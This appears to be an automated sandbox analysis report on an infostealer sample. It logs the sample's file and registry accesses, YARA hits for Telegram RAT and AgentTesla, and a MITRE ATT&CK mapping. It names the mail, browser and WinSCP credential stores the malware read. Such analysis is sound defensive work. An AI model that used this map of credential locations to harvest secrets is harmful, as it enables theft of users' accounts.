                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_02C4F6D0 GetUserNameW,3_2_02C4F6D0

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: Yara matchFile source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR
                Yara detected AgentTesla
                Source: Yara matchFile source: 0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PSFBGrvmxy.exe PID: 5908, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Vlrvln.exe PID: 5684, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: kDPmkTm.exe PID: 4192, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts211
                Windows Management Instrumentation                		11
                Registry Run Keys / Startup Folder                		112
                Process Injection                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                Account Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Web Service                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                PowerShell                		Boot or Logon Initialization Scripts11
                Registry Run Keys / Startup Folder                		1
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		1
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth1
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Obfuscated Files or Information                		1
                Credentials in Registry                		114
                System Information Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration11
                Encrypted Channel                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Masquerading                		NTDS211
                Security Software Discovery                		Distributed Component Object Model111
                Input Capture                		Scheduled Transfer3
                Non-Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                Virtualization/Sandbox Evasion                		LSA Secrets2
                Process Discovery                		SSH1
                Clipboard Data                		Data Transfer Size Limits14
                Application Layer Protocol                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common112
                Process Injection                		Cached Domain Credentials131
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
